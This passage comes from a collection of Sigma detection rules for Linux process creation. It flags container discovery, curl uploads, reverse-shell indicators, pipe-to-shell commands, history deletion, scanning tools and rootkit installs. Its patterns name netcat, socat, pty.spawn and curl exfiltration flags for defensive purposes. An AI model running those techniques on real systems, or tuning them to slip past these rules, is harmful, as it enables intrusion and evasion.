| - https://blog.skyplabs.net/posts/container-detection/ 7 | - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker 8 | tags: 9 | - attack.discovery 10 | - attack.t1082 11 | author: Seth Hanford 12 | date: 2023/08/23 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection_tools: 18 | Image|endswith: 19 | - 'awk' 20 | - '/cat' 21 | - 'grep' 22 | - '/head' 23 | - '/less' 24 | - '/more' 25 | - '/nl' 26 | - '/tail' 27 | selection_procfs_kthreadd: # outside containers, PID 2 == kthreadd 28 | CommandLine|contains: '/proc/2/' 29 | selection_procfs_target: 30 | CommandLine|contains: '/proc/' 31 | CommandLine|endswith: 32 | - '/cgroup' # cgroups end in ':/' outside containers 33 | - '/sched' # PID mismatch when run in containers 34 | condition: selection_tools and 1 of selection_procfs_* 35 | falsepositives: 36 | - Legitimate system administrator usage of these commands 37 | - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered 38 | level: low 39 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Curl File Upload - Linux 2 | id: 00b90cc1-17ec-402c-96ad-3a8117d7a582 3 | related: 4 | - id: 00bca14a-df4e-4649-9054-3f2aa676bc04 5 | type: derived 6 | status: experimental 7 | description: Detects a suspicious curl process start the adds a file to a web request 8 | references: 9 | - https://twitter.com/d1r4c/status/1279042657508081664 10 | - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76 11 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file 12 | - https://curl.se/docs/manpage.html 13 | - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html 14 | author: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update) 15 | date: 2022/09/15 16 | modified: 2023/05/02 17 | tags: 18 | - attack.exfiltration 19 | - attack.t1567 20 | - attack.t1105 21 | logsource: 22 | category: process_creation 23 | product: linux 24 | detection: 25 | selection_img: 26 | Image|endswith: '/curl' 27 | selection_cli: 28 | - CommandLine|contains: 29 | - ' --form' # Also covers the "--form-string" 30 | - ' --upload-file ' 31 | - ' --data ' 32 | - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode" 33 | - CommandLine|re: '\s-[FTd]\s' # We use regex to ensure a case sensitive argument detection 34 | filter_optional_localhost: 35 | CommandLine|contains: 36 | - '://localhost' 37 | - '://127.0.0.1' 38 | condition: all of selection_* and not 1 of filter_optional_* 39 | falsepositives: 40 | - Scripts created by developers and admins 41 | level: medium 42 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Curl Change User Agents - Linux 2 | id: b86d356d-6093-443d-971c-9b07db583c68 3 | related: 4 | - id: 3286d37a-00fd-41c2-a624-a672dcd34e60 5 | type: derived 6 | status: test 7 | description: Detects a suspicious curl process start on linux with set useragent options 8 | references: 9 | - https://curl.se/docs/manpage.html 10 | author: Nasreddine Bencherchali (Nextron Systems) 11 | date: 2022/09/15 12 | tags: 13 | - attack.command_and_control 14 | - attack.t1071.001 15 | logsource: 16 | category: process_creation 17 | product: linux 18 | detection: 19 | selection: 20 | Image|endswith: '/curl' 21 | CommandLine|contains: 22 | - ' -A ' 23 | - ' --user-agent ' 24 | condition: selection 25 | falsepositives: 26 | - Scripts created by developers and admins 27 | - Administrative activity 28 | level: medium 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml: -------------------------------------------------------------------------------- 1 | title: Docker Container Discovery Via Dockerenv Listing 2 | id: 11701de9-d5a5-44aa-8238-84252f131895 3 | status: experimental 4 | description: Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery 5 | references: 6 | - https://blog.skyplabs.net/posts/container-detection/ 7 | - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker 8 | tags: 9 | - attack.discovery 10 | - attack.t1082 11 | author: Seth Hanford 12 | date: 2023/08/23 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | Image|endswith: 19 | # Note: add additional tools and utilities to increase coverage 20 | - '/cat' 21 | - '/dir' 22 | - '/find' 23 | - '/ls' 24 | - '/stat' 25 | - '/test' 26 | - 'grep' 27 | CommandLine|endswith: '.dockerenv' 28 | condition: selection 29 | falsepositives: 30 | - Legitimate system administrator usage of these commands 31 | - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered 32 | level: low 33 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml: -------------------------------------------------------------------------------- 1 | title: Potentially Suspicious Execution From Tmp Folder 2 | id: 312b42b1-bded-4441-8b58-163a3af58775 3 | status: experimental 4 | description: Detects a potentially suspicious execution of a process located in the '/tmp/' folder 5 | references: 6 | - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html 7 | - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ 8 | - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection 9 | - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 10 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 11 | date: 2023/06/02 12 | tags: 13 | - attack.defense_evasion 14 | - attack.t1036 15 | logsource: 16 | product: linux 17 | category: process_creation 18 | detection: 19 | selection: 20 | Image|startswith: '/tmp/' 21 | condition: selection 22 | falsepositives: 23 | - Unknown 24 | level: high 25 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml: -------------------------------------------------------------------------------- 1 | title: Potential Discovery Activity Using Find - Linux 2 | id: 8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf 3 | related: 4 | - id: 85de3a19-b675-4a51-bfc6-b11a5186c971 5 | type: similar 6 | status: test 7 | description: Detects usage of "find" binary in a suspicious manner to perform discovery 8 | references: 9 | - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes 10 | author: Nasreddine Bencherchali (Nextron Systems) 11 | date: 2022/12/28 12 | tags: 13 | - attack.discovery 14 | - attack.t1083 15 | logsource: 16 | category: process_creation 17 | product: linux 18 | detection: 19 | selection: 20 | Image|endswith: '/find' 21 | CommandLine|contains: 22 | - '-perm -4000' 23 | - '-perm -2000' 24 | - '-perm 0777' 25 | - '-perm -222' 26 | - '-perm -o w' 27 | - '-perm -o x' 28 | - '-perm -u=s' 29 | - '-perm -g=s' 30 | condition: selection 31 | falsepositives: 32 | - Unknown 33 | level: medium 34 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Git Clone - Linux 2 | id: cfec9d29-64ec-4a0f-9ffe-0fdb856d5446 3 | status: test 4 | description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious 5 | references: 6 | - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2023/01/03 9 | modified: 2023/01/05 10 | tags: 11 | - attack.reconnaissance 12 | - attack.t1593.003 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection_img: 18 | Image|endswith: '/git' 19 | CommandLine|contains: ' clone ' 20 | selection_keyword: 21 | CommandLine|contains: 22 | # Add more suspicious keywords 23 | - 'exploit' 24 | - 'Vulns' 25 | - 'vulnerability' 26 | - 'RCE' 27 | - 'RemoteCodeExecution' 28 | - 'Invoke-' 29 | - 'CVE-' 30 | - 'poc-' 31 | - 'ProofOfConcept' 32 | # Add more vuln names 33 | - 'proxyshell' 34 | - 'log4shell' 35 | - 'eternalblue' 36 | - 'eternal-blue' 37 | - 'MS17-' 38 | condition: all of selection_* 39 | falsepositives: 40 | - Unknown 41 | level: medium 42 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml: -------------------------------------------------------------------------------- 1 | title: History File Deletion 2 | id: 1182f3b3-e716-4efa-99ab-d2685d04360f 3 | status: test 4 | description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity 5 | references: 6 | - https://github.com/sleventyeleven/linuxprivchecker/ 7 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md 8 | author: Florian Roth (Nextron Systems) 9 | date: 2022/06/20 10 | modified: 2022/09/15 11 | tags: 12 | - attack.impact 13 | - attack.t1565.001 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection: 19 | Image|endswith: 20 | - '/rm' 21 | - '/unlink' 22 | - '/shred' 23 | selection_history: 24 | - CommandLine|contains: 25 | - '/.bash_history' 26 | - '/.zsh_history' 27 | - CommandLine|endswith: 28 | - '_history' 29 | - '.history' 30 | - 'zhistory' 31 | condition: all of selection* 32 | falsepositives: 33 | - Legitimate administration activities 34 | level: high 35 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml: -------------------------------------------------------------------------------- 1 | title: Print History File Contents 2 | id: d7821ff1-4527-4e33-9f84-d0d57fa2fb66 3 | status: test 4 | description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance 5 | references: 6 | - https://github.com/sleventyeleven/linuxprivchecker/ 7 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md 8 | author: Florian Roth (Nextron Systems) 9 | date: 2022/06/20 10 | modified: 2022/09/15 11 | tags: 12 | - attack.reconnaissance 13 | - attack.t1592.004 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection: 19 | Image|endswith: 20 | - '/cat' 21 | - '/head' 22 | - '/tail' 23 | - '/more' 24 | selection_history: 25 | - CommandLine|contains: 26 | - '/.bash_history' 27 | - '/.zsh_history' 28 | - CommandLine|endswith: 29 | - '_history' 30 | - '.history' 31 | - 'zhistory' 32 | condition: all of selection* 33 | falsepositives: 34 | - Legitimate administration activities 35 | level: medium 36 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml: -------------------------------------------------------------------------------- 1 | title: Potential Container Discovery Via Inodes Listing 2 | id: 43e26eb5-cd58-48d1-8ce9-a273f5d298d8 3 | status: experimental 4 | description: Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container. 5 | references: 6 | - https://blog.skyplabs.net/posts/container-detection/ 7 | - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker 8 | tags: 9 | - attack.discovery 10 | - attack.t1082 11 | author: Seth Hanford 12 | date: 2023/08/23 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | # inode outside containers low, inside high 19 | Image|endswith: '/ls' 20 | CommandLine|contains|all: 21 | - ' -*i' # -i finds inode number 22 | - ' -*d' # -d gets directory itself, not contents 23 | CommandLine|endswith: ' /' 24 | condition: selection 25 | falsepositives: 26 | - Legitimate system administrator usage of these commands 27 | - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered 28 | level: low 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml: -------------------------------------------------------------------------------- 1 | title: Interactive Bash Suspicious Children 2 | id: ea3ecad2-db86-4a89-ad0b-132a10d2db55 3 | status: test 4 | description: Detects suspicious interactive bash as a parent to rather uncommon child processes 5 | references: 6 | - Internal Research 7 | author: Florian Roth (Nextron Systems) 8 | date: 2022/03/14 9 | tags: 10 | - attack.execution 11 | - attack.defense_evasion 12 | - attack.t1059.004 13 | - attack.t1036 14 | logsource: 15 | product: linux 16 | category: process_creation 17 | detection: 18 | selection: 19 | ParentCommandLine: 'bash -i' 20 | anomaly1: 21 | CommandLine|contains: 22 | - '-c import ' 23 | - 'base64' 24 | - 'pty.spawn' 25 | anomaly2: 26 | Image|endswith: 27 | - 'whoami' 28 | - 'iptables' 29 | - '/ncat' 30 | - '/nc' 31 | - '/netcat' 32 | condition: selection and 1 of anomaly* 33 | falsepositives: 34 | - Legitimate software that uses these patterns 35 | level: medium 36 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Java Children Processes 2 | id: d292e0af-9a18-420c-9525-ec0ac3936892 3 | status: test 4 | description: Detects java process spawning suspicious children 5 | references: 6 | - https://www.tecmint.com/different-types-of-linux-shells/ 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2022/06/03 9 | tags: 10 | - attack.execution 11 | - attack.t1059 12 | logsource: 13 | category: process_creation 14 | product: linux 15 | detection: 16 | selection: 17 | ParentImage|endswith: '/java' 18 | CommandLine|contains: 19 | - '/bin/sh' 20 | - 'bash' 21 | - 'dash' 22 | - 'ksh' 23 | - 'zsh' 24 | - 'csh' 25 | - 'fish' 26 | - 'curl' 27 | - 'wget' 28 | - 'python' 29 | condition: selection 30 | falsepositives: 31 | - Unknown 32 | level: high 33 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml: -------------------------------------------------------------------------------- 1 | title: Linux Network Service Scanning Tools Execution 2 | id: 3e102cd9-a70d-4a7a-9508-403963092f31 3 | status: test 4 | description: Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md 7 | - https://github.com/projectdiscovery/naabu 8 | - https://github.com/Tib3rius/AutoRecon 9 | author: Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure]) 10 | date: 2020/10/21 11 | modified: 2023/10/25 12 | tags: 13 | - attack.discovery 14 | - attack.t1046 15 | logsource: 16 | category: process_creation 17 | product: linux 18 | detection: 19 | selection_netcat: 20 | Image|endswith: 21 | - '/nc' 22 | - '/ncat' 23 | - '/netcat' 24 | - '/socat' 25 | selection_network_scanning_tools: 26 | Image|endswith: 27 | - '/autorecon' 28 | - '/hping' 29 | - '/hping2' 30 | - '/hping3' 31 | - '/naabu' 32 | - '/nmap' 33 | - '/nping' 34 | - '/telnet' # could be wget, curl, ssh, many things. basically everything that is able to do network connection. consider fine tuning 35 | filter_main_netcat_listen_flag: 36 | CommandLine|contains: 37 | - ' --listen ' 38 | - ' -l ' 39 | condition: (selection_netcat and not filter_main_netcat_listen_flag) or selection_network_scanning_tools 40 | falsepositives: 41 | - Legitimate administration activities 42 | level: low 43 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml: -------------------------------------------------------------------------------- 1 | title: Linux Shell Pipe to Shell 2 | id: 880973f3-9708-491c-a77b-2a35a1921158 3 | status: test 4 | description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell 5 | references: 6 | - Internal Research 7 | author: Florian Roth (Nextron Systems) 8 | date: 2022/03/14 9 | modified: 2022/07/26 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1140 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | CommandLine|startswith: 19 | - 'sh -c ' 20 | - 'bash -c ' 21 | selection_exec: 22 | - CommandLine|contains: 23 | - '| bash ' 24 | - '| sh ' 25 | - '|bash ' 26 | - '|sh ' 27 | - CommandLine|endswith: 28 | - '| bash' 29 | - '| sh' 30 | - '|bash' 31 | - ' |sh' 32 | condition: all of selection* 33 | falsepositives: 34 | - Legitimate software that uses these patterns 35 | level: medium 36 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml: -------------------------------------------------------------------------------- 1 | title: Linux Recon Indicators 2 | id: 0cf7a157-8879-41a2-8f55-388dd23746b7 3 | status: test 4 | description: Detects events with patterns found in commands used for reconnaissance on linux systems 5 | references: 6 | - https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py 7 | author: Florian Roth (Nextron Systems) 8 | date: 2022/06/20 9 | tags: 10 | - attack.reconnaissance 11 | - attack.t1592.004 12 | - attack.credential_access 13 | - attack.t1552.001 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection: 19 | CommandLine|contains: 20 | - ' -name .htpasswd' 21 | - ' -perm -4000 ' 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administration activities 25 | level: high 26 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_sensitive_file_access.yml: -------------------------------------------------------------------------------- 1 | title: Potential Suspicious Change To Sensitive/Critical Files 2 | id: 86157017-c2b1-4d4a-8c33-93b8e67e4af4 3 | status: experimental 4 | description: Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system. 5 | references: 6 | - https://docs.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor 7 | author: '@d4ns4n_ (Wuerth-Phoenix)' 8 | date: 2023/05/30 9 | tags: 10 | - attack.impact 11 | - attack.t1565.001 12 | logsource: 13 | category: process_creation 14 | product: linux 15 | detection: 16 | selection_img_1: 17 | Image|endswith: 18 | - '/cat' 19 | - '/echo' 20 | - '/grep' 21 | - '/head' 22 | - '/more' 23 | - '/tail' 24 | CommandLine|contains: '>' 25 | selection_img_2: 26 | Image|endswith: 27 | - '/emacs' 28 | - '/nano' 29 | - '/sed' 30 | - '/vi' 31 | - '/vim' 32 | selection_paths: 33 | CommandLine|contains: 34 | - '/bin/login' 35 | - '/bin/passwd' 36 | - '/boot/' 37 | - '/etc/*.conf' 38 | - '/etc/cron.' # Covers different cron config files "daily", "hourly", etc. 39 | - '/etc/crontab' 40 | - '/etc/hosts' 41 | - '/etc/init.d' 42 | - '/etc/sudoers' 43 | - '/opt/bin/' 44 | - '/sbin' # Covers: '/opt/sbin', '/usr/local/sbin/', '/usr/sbin/' 45 | - '/usr/bin/' 46 | - '/usr/local/bin/' 47 | condition: 1 of selection_img_* and selection_paths 48 | falsepositives: 49 | - Some false positives are to be expected on user or administrator machines. Apply additional filters as needed. 50 | level: medium 51 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml: -------------------------------------------------------------------------------- 1 | title: Shell Execution Of Process Located In Tmp Directory 2 | id: 2fade0b6-7423-4835-9d4f-335b39b83867 3 | status: experimental 4 | description: Detects execution of shells from a parent process located in a temporary (/tmp) directory 5 | references: 6 | - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html 7 | - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ 8 | - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection 9 | - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 10 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 11 | date: 2023/06/02 12 | tags: 13 | - attack.execution 14 | logsource: 15 | product: linux 16 | category: process_creation 17 | detection: 18 | selection: 19 | ParentImage|startswith: '/tmp/' 20 | Image|endswith: 21 | - '/bash' 22 | - '/csh' 23 | - '/dash' 24 | - '/fish' 25 | - '/ksh' 26 | - '/sh' 27 | - '/zsh' 28 | condition: selection 29 | falsepositives: 30 | - Unknown 31 | level: high 32 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml: -------------------------------------------------------------------------------- 1 | title: Execution Of Script Located In Potentially Suspicious Directory 2 | id: 30bcce26-51c5-49f2-99c8-7b59e3af36c7 3 | status: experimental 4 | description: Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc. 5 | references: 6 | - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html 7 | - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ 8 | - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection 9 | - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 10 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 11 | date: 2023/06/02 12 | tags: 13 | - attack.execution 14 | logsource: 15 | product: linux 16 | category: process_creation 17 | detection: 18 | selection_img: 19 | Image|endswith: 20 | - '/bash' 21 | - '/csh' 22 | - '/dash' 23 | - '/fish' 24 | - '/ksh' 25 | - '/sh' 26 | - '/zsh' 27 | selection_flag: 28 | CommandLine|contains: ' -c ' 29 | selection_paths: 30 | # Note: Add more suspicious paths 31 | CommandLine|contains: '/tmp/' 32 | condition: all of selection_* 33 | falsepositives: 34 | - Unknown 35 | level: medium 36 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml: -------------------------------------------------------------------------------- 1 | title: System Information Discovery 2 | id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 3 | status: stable 4 | description: Detects system information discovery commands 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md 7 | author: Ömer Günal, oscd.community 8 | date: 2020/10/08 9 | modified: 2021/09/14 10 | tags: 11 | - attack.discovery 12 | - attack.t1082 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | Image|endswith: 19 | - '/uname' 20 | - '/hostname' 21 | - '/uptime' 22 | - '/lspci' 23 | - '/dmidecode' 24 | - '/lscpu' 25 | - '/lsmod' 26 | condition: selection 27 | falsepositives: 28 | - Legitimate administration activities 29 | level: informational 30 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml: -------------------------------------------------------------------------------- 1 | title: System Network Connections Discovery - Linux 2 | id: 4c519226-f0cd-4471-bd2f-6fbb2bb68a79 3 | status: test 4 | description: Detects usage of system utilities to discover system network connections 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md 7 | author: Daniil Yugoslavskiy, oscd.community 8 | date: 2020/10/19 9 | modified: 2023/01/17 10 | tags: 11 | - attack.discovery 12 | - attack.t1049 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | Image|endswith: 19 | - '/who' 20 | - '/w' 21 | - '/last' 22 | - '/lsof' 23 | - '/netstat' 24 | filter_landscape_sysinfo: 25 | ParentCommandLine|contains: '/usr/bin/landscape-sysinfo' 26 | Image|endswith: '/who' 27 | condition: selection and not 1 of filter_* 28 | falsepositives: 29 | - Legitimate activities 30 | level: low 31 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml: -------------------------------------------------------------------------------- 1 | title: System Network Discovery - Linux 2 | id: e7bd1cfa-b446-4c88-8afb-403bcd79e3fa 3 | status: test 4 | description: Detects enumeration of local network configuration 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md 7 | author: Ömer Günal and remotephone, oscd.community 8 | date: 2020/10/06 9 | modified: 2022/09/15 10 | tags: 11 | - attack.discovery 12 | - attack.t1016 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection_img: 18 | Image|endswith: 19 | - '/firewall-cmd' 20 | - '/ufw' 21 | - '/iptables' 22 | - '/netstat' 23 | - '/ss' 24 | - '/ip' 25 | - '/ifconfig' 26 | - '/systemd-resolve' 27 | - '/route' 28 | selection_cli: 29 | CommandLine|contains: '/etc/resolv.conf' 30 | condition: 1 of selection_* 31 | falsepositives: 32 | - Legitimate administration activities 33 | level: informational 34 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_touch_susp.yml: -------------------------------------------------------------------------------- 1 | title: Touch Suspicious Service File 2 | id: 31545105-3444-4584-bebf-c466353230d2 3 | status: experimental 4 | description: Detects usage of the "touch" process in service file. 5 | references: 6 | - https://blogs.blackberry.com/ 7 | - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 8 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 9 | date: 2023/01/11 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1070.006 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | Image|endswith: '/touch' 19 | CommandLine|contains: ' -t ' 20 | CommandLine|endswith: '.service' 21 | condition: selection 22 | falsepositives: 23 | - Admin changing date of files. 24 | level: medium 25 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml: -------------------------------------------------------------------------------- 1 | title: Triple Cross eBPF Rootkit Execve Hijack 2 | id: 0326c3c8-7803-4a0f-8c5c-368f747f7c3e 3 | status: test 4 | description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges 5 | references: 6 | - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2022/07/05 9 | tags: 10 | - attack.defense_evasion 11 | - attack.privilege_escalation 12 | logsource: 13 | category: process_creation 14 | product: linux 15 | detection: 16 | selection: 17 | Image|endswith: '/sudo' 18 | CommandLine|contains: 'execve_hijack' 19 | condition: selection 20 | falsepositives: 21 | - Unlikely 22 | level: high 23 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml: -------------------------------------------------------------------------------- 1 | title: Triple Cross eBPF Rootkit Install Commands 2 | id: 22236d75-d5a0-4287-bf06-c93b1770860f 3 | status: test 4 | description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script 5 | references: 6 | - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2022/07/05 9 | tags: 10 | - attack.defense_evasion 11 | - attack.t1014 12 | logsource: 13 | category: process_creation 14 | product: linux 15 | detection: 16 | selection: 17 | Image|endswith: '/sudo' 18 | CommandLine|contains|all: 19 | - ' tc ' 20 | - ' enp0s3 ' 21 | CommandLine|contains: 22 | - ' qdisc ' 23 | - ' filter ' 24 | condition: selection 25 | falsepositives: 26 | - Unlikely 27 | level: high 28 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_userdel.yml: -------------------------------------------------------------------------------- 1 | title: User Has Been Deleted Via Userdel 2 | id: 08f26069-6f80-474b-8d1f-d971c6fedea0 3 | status: test 4 | description: Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks 5 | references: 6 | - https://linuxize.com/post/how-to-delete-group-in-linux/ 7 | - https://www.cyberciti.biz/faq/linux-remove-user-command/ 8 | - https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/ 9 | - https://linux.die.net/man/8/userdel 10 | author: Tuan Le (NCSGroup) 11 | date: 2022/12/26 12 | tags: 13 | - attack.impact 14 | - attack.t1531 15 | logsource: 16 | product: linux 17 | category: process_creation 18 | detection: 19 | selection: 20 | Image|endswith: '/userdel' 21 | condition: selection 22 | falsepositives: 23 | - Legitimate administrator activities 24 | level: medium 25 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml: -------------------------------------------------------------------------------- 1 | title: User Added To Root/Sudoers Group Using Usermod 2 | id: 6a50f16c-3b7b-42d1-b081-0fdd3ba70a73 3 | status: test 4 | description: Detects usage of the "usermod" binary to add users add users to the root or suoders groups 5 | references: 6 | - https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/ 7 | - https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/ 8 | author: TuanLe (GTSC) 9 | date: 2022/12/21 10 | tags: 11 | - attack.privilege_escalation 12 | - attack.persistence 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | Image|endswith: '/usermod' 19 | CommandLine|contains: 20 | - '-aG root' 21 | - '-aG sudoers' 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administrator activities 25 | level: medium 26 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml: -------------------------------------------------------------------------------- 1 | title: Linux Webshell Indicators 2 | id: 818f7b24-0fba-4c49-a073-8b755573b9c7 3 | status: test 4 | description: Detects suspicious sub processes of web server processes 5 | references: 6 | - https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/ 7 | - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF 8 | author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) 9 | date: 2021/10/15 10 | modified: 2022/12/28 11 | tags: 12 | - attack.persistence 13 | - attack.t1505.003 